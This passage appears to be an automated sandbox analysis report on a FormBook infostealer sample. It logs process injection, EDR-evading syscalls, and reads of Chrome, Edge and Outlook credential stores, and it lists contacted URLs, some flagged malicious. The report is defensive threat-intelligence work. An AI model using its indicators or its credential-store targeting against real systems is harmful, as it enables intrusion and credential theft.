            Source: C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exeNtTerminateThread: Direct from: 0x77762FCCJump to behavior
            Source: C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exeNtCreateFile: Direct from: 0x77762FECJump to behavior
            Source: C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exeNtOpenFile: Direct from: 0x77762DCCJump to behavior
            Source: C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exeNtOpenKeyEx: Direct from: 0x77762B9CJump to behavior
            Source: C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exeNtSetInformationProcess: Direct from: 0x77762C5CJump to behavior
            Source: C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exeNtProtectVirtualMemory: Direct from: 0x77762F9CJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\clip.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: NULL target: C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: NULL target: C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\clip.exeThread register set: target process: 7548Jump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\clip.exeThread APC queued: target process: C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exeJump to behavior
            Writes to foreign memory regions
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2842008Jump to behavior
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exeCode function: 4_2_00E68C93 LogonUserW,4_2_00E68C93
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exeCode function: 4_2_00E13B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,4_2_00E13B4C
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exeCode function: 4_2_00E14A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,4_2_00E14A35
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exeCode function: 4_2_00E74EF5 mouse_event,4_2_00E74EF5
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\TOgpmvvWoj.exe"Jump to behavior
            Source: C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exeProcess created: C:\Windows\SysWOW64\clip.exe "C:\Windows\SysWOW64\clip.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\clip.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exeCode function: 4_2_00E681F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,4_2_00E681F7
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exeCode function: 4_2_00E74C03 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,4_2_00E74C03
            Source: TOgpmvvWoj.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
            Source: TOgpmvvWoj.exe, ftlDDsmJxbqfWuvUNSEx.exe, 00000008.00000002.3762563946.00000000018C0000.00000002.00000001.00040000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 00000008.00000000.1411852291.00000000018C1000.00000002.00000001.00040000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000000.1556342210.0000000001480000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: ftlDDsmJxbqfWuvUNSEx.exe, 00000008.00000002.3762563946.00000000018C0000.00000002.00000001.00040000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 00000008.00000000.1411852291.00000000018C1000.00000002.00000001.00040000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000000.1556342210.0000000001480000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: ftlDDsmJxbqfWuvUNSEx.exe, 00000008.00000002.3762563946.00000000018C0000.00000002.00000001.00040000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 00000008.00000000.1411852291.00000000018C1000.00000002.00000001.00040000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000000.1556342210.0000000001480000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: ?Program Manager
            Source: ftlDDsmJxbqfWuvUNSEx.exe, 00000008.00000002.3762563946.00000000018C0000.00000002.00000001.00040000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 00000008.00000000.1411852291.00000000018C1000.00000002.00000001.00040000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000000.1556342210.0000000001480000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exeCode function: 4_2_00E3886B cpuid 4_2_00E3886B
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exeCode function: 4_2_00E450D7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,4_2_00E450D7
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exeCode function: 4_2_00E52230 GetUserNameW,4_2_00E52230
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exeCode function: 4_2_00E4418A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,4_2_00E4418A
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exeCode function: 4_2_00E14AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,4_2_00E14AFE

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 6.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000006.00000002.1485611383.00000000032C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.1484985282.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.3762941792.0000000002DC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.3758152425.0000000002A10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.3763129724.0000000002E00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.1486102715.0000000003A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.3763045399.0000000002FE0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\clip.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\clip.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
            Source: TOgpmvvWoj.exeBinary or memory string: WIN_81
            Source: TOgpmvvWoj.exeBinary or memory string: WIN_XP
            Source: TOgpmvvWoj.exeBinary or memory string: WIN_XPe
            Source: TOgpmvvWoj.exeBinary or memory string: WIN_VISTA
            Source: TOgpmvvWoj.exeBinary or memory string: WIN_7
            Source: TOgpmvvWoj.exeBinary or memory string: WIN_8
            Source: TOgpmvvWoj.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 6.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000006.00000002.1485611383.00000000032C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.1484985282.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.3762941792.0000000002DC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.3758152425.0000000002A10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.3763129724.0000000002E00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.1486102715.0000000003A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.3763045399.0000000002FE0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exeCode function: 4_2_00E86596 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,4_2_00E86596
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exeCode function: 4_2_00E86A5A socket,WSAGetLastError,bind,WSAGetLastError,closesocket,4_2_00E86A5A

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire Infrastructure2
            Valid Accounts            		2
            Native API            		1
            DLL Side-Loading            		1
            Exploitation for Privilege Escalation            		1
            Disable or Modify Tools            		1
            OS Credential Dumping            		2
            System Time Discovery            		Remote Services1
            Archive Collected Data            		4
            Ingress Tool Transfer            		Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/Job2
            Valid Accounts            		1
            Abuse Elevation Control Mechanism            		1
            Deobfuscate/Decode Files or Information            		21
            Input Capture            		1
            Account Discovery            		Remote Desktop Protocol1
            Data from Local System            		1
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading            		1
            Abuse Elevation Control Mechanism            		Security Account Manager2
            File and Directory Discovery            		SMB/Windows Admin Shares1
            Email Collection            		4
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
            Valid Accounts            		3
            Obfuscated Files or Information            		NTDS116
            System Information Discovery            		Distributed Component Object Model21
            Input Capture            		4
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
            Access Token Manipulation            		1
            DLL Side-Loading            		LSA Secrets151
            Security Software Discovery            		SSH3
            Clipboard Data            		Fallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
            Process Injection            		2
            Valid Accounts            		Cached Domain Credentials2
            Virtualization/Sandbox Evasion            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
            Virtualization/Sandbox Evasion            		DCSync3
            Process Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
            Access Token Manipulation            		Proc Filesystem11
            Application Window Discovery            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
            Process Injection            		/etc/passwd and /etc/shadow1
            System Owner/User Discovery            		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1467718 Sample: TOgpmvvWoj.exe Startdate: 04/07/2024 Architecture: WINDOWS Score: 100 28 www.xn--matfrmn-jxa4m.se 2->28 30 www.xn--fhq1c541j0zr.com 2->30 32 13 other IPs or domains 2->32 42 Snort IDS alert for network traffic 2->42 44 Malicious sample detected (through community Yara rule) 2->44 46 Antivirus detection for URL or domain 2->46 48 5 other signatures 2->48 10 TOgpmvvWoj.exe 4 2->10         started        signatures3 process4 signatures5 60 Binary is likely a compiled AutoIt script file 10->60 62 Writes to foreign memory regions 10->62 64 Maps a DLL or memory area into another process 10->64 66 Switches to a custom stack to bypass stack traces 10->66 13 svchost.exe 10->13         started        process6 signatures7 68 Maps a DLL or memory area into another process 13->68 16 ftlDDsmJxbqfWuvUNSEx.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 clip.exe 13 16->19         started        process10 signatures11 50 Tries to steal Mail credentials (via file / registry access) 19->50 52 Tries to harvest and steal browser information (history, passwords, etc) 19->52 54 Modifies the context of a thread in another process (thread injection) 19->54 56 3 other signatures 19->56 22 ftlDDsmJxbqfWuvUNSEx.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 www.anuts.top 23.251.54.212, 49724, 49725, 49726 VPSQUANUS United States 22->34 36 parkingpage.namecheap.com 91.195.240.19, 49736, 49737, 49738 SEDO-ASDE Germany 22->36 38 9 other IPs or domains 22->38 58 Found direct / indirect Syscall (likely to bypass EDR) 22->58 signatures14

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            TOgpmvvWoj.exe61%ReversingLabsWin32.Trojan.Nymeria
            TOgpmvvWoj.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            https://www.ecosia.org/newtab/0%URL Reputationsafe
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
            https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
            https://www.reg.ru/whois/?check=&dname=www.helpers-lion.online&amp;reg_source=parking_auto0%Avira URL Cloudsafe
            http://www.dmtxwuatbz.cc/lfkn/?YbCL=gu3cG9GLpLv0C38agzY8Nc5HI9FnWTYycVQhN1coGdiN+H1mAKnEyno+ahRh93ZPWIJTdN+wkaWXNdzclzMT/Ba73/TyhXTi+N+fxoCuIe0q13OxeEQrax/xffncDH6aKqzo3DUBHR/D&fhW=BLvXr6e0EhyxeX0%Avira URL Cloudsafe
            https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
            http://www.bfiworkerscomp.com/Free_Downloads.cfm?fp=4x%2Bj9sdm3eC7HUqiUq%2FlUrOWlceBTk4Vo1G%2F%2BtVz0%Avira URL Cloudsafe
            http://www.telwisey.info/ei85/?YbCL=ORmqfURBt40sHMHN3K9lcqnOZkw5OMnI9iieY9Aomdlbsbne+w1Kch9DF1irZ5FVSFO0rJB3/OJZWwrRbdUXmSJOUDfP2hLYj3hfUWwVMjhSgAyvEJN1ww7Of4RepeBVRZKy4AbjBLzj&fhW=BLvXr6e0EhyxeX0%Avira URL Cloudsafe
            https://reg.ru0%Avira URL Cloudsafe
            http://www.bfiworkerscomp.com/xzzi/0%Avira URL Cloudsafe
            http://www.hprlz.cz/w6qg/?fhW=BLvXr6e0EhyxeX&YbCL=0lpTRQcDUH+iEsGzFrKDlEkxf0hSGbqe7Z/xuNmTgdli9rpOUGyXizj5cQ9XxC4so84FNpFR9txXxm0tq1CazhdUSIVLCtkAjvELp631DJLKvEqqNibis4AF0Y/xQXWBRPCD91/FJrEz0%Avira URL Cloudsafe
            https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
            https://www.loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parking0%Avira URL Cloudsafe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
            https://parking.reg.ru/script/get_domain_data?domain_name=www.helpers-lion.online&rand=0%Avira URL Cloudsafe
            http://www.domaintechnik.at/data/gfx/dt_logo_parking.png0%Avira URL Cloudsafe
            https://www.reg.ru/domain/new/?utm_source=www.helpers-lion.online&utm_medium=parking&utm_campaign=s_0%Avira URL Cloudsafe
            https://www.loopia.com/order/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw0%Avira URL Cloudsafe
            http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otf0%Avira URL Cloudsafe
            http://i3.cdn-image.com/__media__/pics/10667/netsol-logos-2020-165-50.jpg0%Avira URL Cloudsafe
            http://www.dmtxwuatbz.cc/lfkn/0%Avira URL Cloudsafe
            https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css0%Avira URL Cloudsafe
            http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff20%Avira URL Cloudsafe
            http://www.sandranoll.com/aroo/100%Avira URL Cloudmalware
            http://www.xn--matfrmn-jxa4m.se/4hda/100%Avira URL Cloudmalware
            http://i3.cdn-image.com/__media__/pics/29590/bg1.png)0%Avira URL Cloudsafe
            http://www.gipsytroya.com/tf44/0%Avira URL Cloudsafe
            https://static.loopia.se/shared/images/additional-pages-hero-shape.webp0%Avira URL Cloudsafe
            https://www.domaintechnik.at/fileadmin/gfx/icons/sslserver.png0%Avira URL Cloudsafe
            http://www.bfiworkerscomp.com/__media__/design/underconstructionnotice.php?d=bfiworkerscomp.com0%Avira URL Cloudsafe
            http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff0%Avira URL Cloudsafe
            http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot0%Avira URL Cloudsafe
            http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff20%Avira URL Cloudsafe
            https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park0%Avira URL Cloudsafe
            http://i3.cdn-image.com/__media__/pics/28905/arrrow.png)0%Avira URL Cloudsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
            https://www.reg.ru/hosting/?utm_source=www.helpers-lion.online&utm_medium=parking&utm_campaign=s_lan0%Avira URL Cloudsafe
            https://help.reg.ru/support/ssl-sertifikaty/1-etap-zakaz-ssl-sertifikata/kak-zakazat-besplatnyy-ssl-0%Avira URL Cloudsafe
            http://www.sandranoll.com/aroo/?fhW=BLvXr6e0EhyxeX&YbCL=bKy7FSIHmKYFjPoPKsunUN9vBLYaDX52twFEynhtde+XdOqoRjh1sl1n+ba+sSXyFBuEELqLWRHnTW9JDkHGG0QhvMR72FivEUbGSmkuxinEDBYWWrvqFUEDSzpZ60+MRxZstpJridvk100%Avira URL Cloudmalware
            http://whois.loopia.com/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&ut0%Avira URL Cloudsafe
            http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttf0%Avira URL Cloudsafe
            http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttf0%Avira URL Cloudsafe
            https://www.reg.ru/web-sites/?utm_source=www.helpers-lion.online&utm_medium=parking&utm_campaign=s_l0%Avira URL Cloudsafe
            https://cdnjs.cloudflare.com/ajax/libs/gsap/3.1.1/gsap.min.js0%Avira URL Cloudsafe
            https://www.domaintechnik.at/fileadmin/gfx/logos/hostedsoft/contao.png0%Avira URL Cloudsafe
            https://www.reg.ru/dedicated/?utm_source=www.helpers-lion.online&utm_medium=parking&utm_campaign=s_l0%Avira URL Cloudsafe
            http://www.anuts.top/li0t/0%Avira URL Cloudsafe
            https://www.loopia.com/domainnames/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa0%Avira URL Cloudsafe
            https://www.hprlz.cz/w6qg/?fhW=BLvXr6e0EhyxeX&amp;YbCL=0lpTRQcDUH0%Avira URL Cloudsafe
            http://www.bfiworkerscomp.com/Alternative_Financing.cfm?fp=4x%2Bj9sdm3eC7HUqiUq%2FlUrOWlceBTk4Vo1G%20%Avira URL Cloudsafe
            https://www.hprlz.cz/w6qg/?fhW=BLvXr6e0EhyxeX&YbCL=0lpTRQcDUH0%Avira URL Cloudsafe
            http://www.catherineviskadi.com/qe66/0%Avira URL Cloudsafe
            https://www.loopia.com/woocommerce/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa0%Avira URL Cloudsafe
            https://www.loopia.se?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb0%Avira URL Cloudsafe
            http://www.bfiworkerscomp.com/__media__/js/trademark.php?d=bfiworkerscomp.com&type=ns0%Avira URL Cloudsafe
            http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff0%Avira URL Cloudsafe
            http://i3.cdn-image.com/__media__/pics/28903/search.png)0%Avira URL Cloudsafe
            https://cdn.consentmanager.net0%Avira URL Cloudsafe
            https://www.reg.ru/web-sites/website-builder/?utm_source=www.helpers-lion.online&utm_medium=parking&0%Avira URL Cloudsafe
            https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css0%Avira URL Cloudsafe
            https://www.domaintechnik.at/fileadmin/gfx/logos/hostedsoft/gallery.png0%Avira URL Cloudsafe
            https://static.loopia.se/responsive/images/iOS-72.png0%Avira URL Cloudsafe
            http://www.helpers-lion.online/mooq/?fhW=BLvXr6e0EhyxeX&YbCL=6C5pq03gIUcCxycao4jVOd5j2ETtSk+CIQvh/K6jTje/eWOGI1u26kAEsQXtCs3elXAZegkYPdXqLAdc1WNGmvwMEDU2l3Vk/j3vF3XZl1x4VY01FUKFB6WA/ZrLtnyfA2FlJPqZ/llT0%Avira URL Cloudsafe
            http://www.xn--fhq1c541j0zr.com/rm91/0%Avira URL Cloudsafe
            https://static.loopia.se/shared/logo/logo-loopia-white.svg0%Avira URL Cloudsafe
            http://www.bfiworkerscomp.com/xzzi/?fhW=BLvXr6e0EhyxeX&YbCL=9CTSfwlM5YWl8fva1LSaXKM8r2QUgbHW1FpC9VokAvwkUHOJycf2DDxLp9tWLELwEKEPfCC2oiLqmqE9jQi/T4RMdgNWnwSdCIYHgMQCJ4NovZBdigdGOlTiGNjGNRbnTmMSUCfOcFfR0%Avira URL Cloudsafe
            https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwe0%Avira URL Cloudsafe
            http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otf0%Avira URL Cloudsafe
            http://www.xn--fhq1c541j0zr.com/rm91/?fhW=BLvXr6e0EhyxeX&YbCL=jSd7r+67+N1qAQkxX/tAwzcZagSYI1kZQchR8WhIexhCyQiFJMwmzlR6zVHzfOVMvsfcwBywDpFhuhrgfB+WH8ALvnjmtlYhpciewdwpfxiI173pYZLp0P/Ncxt8Rkrw2XK7hs/fa/r10%Avira URL Cloudsafe
            http://www.catherineviskadi.com/qe66/?YbCL=dnvLceXALBk3Hr4/PEp98EYmblYqw8i+NG0MGchlNc+FfqCdFLzpUNQMmrv30qtrBi93uCjMcFA24SebHgOv+z+o+Zy5RZ1L4zwBfly91+2hSvhVojey3gmTZ6j57PRX7U3n66rWnGeG&fhW=BLvXr6e0EhyxeX0%Avira URL Cloudsafe
            http://www.xn--matfrmn-jxa4m.se/4hda/?YbCL=+FYRabRorC7iiipcHmFJARkvcpdCy5kXHVGGEQvE/CSzp7OmTlR57ws6ggMdmmjgEK74RwiZfuW5KkdpyqG9/f3zij1q4lqhkHJ2CNqkydCYpEmp0eXiAcXcwGmcRWkkIq9RVVQfBdjK&fhW=BLvXr6e0EhyxeX100%Avira URL Cloudmalware
            http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefix0%Avira URL Cloudsafe
            https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park0%Avira URL Cloudsafe
            http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot0%Avira URL Cloudsafe
            http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.svg#montserrat-bold0%Avira URL Cloudsafe
            https://delivery.consentmanager.net0%Avira URL Cloudsafe
            https://static.loopia.se/shared/style/2022-extra-pages.css0%Avira URL Cloudsafe
            https://static.loopia.se/responsive/images/iOS-114.png0%Avira URL Cloudsafe
            http://www.telwisey.info/ei85/0%Avira URL Cloudsafe
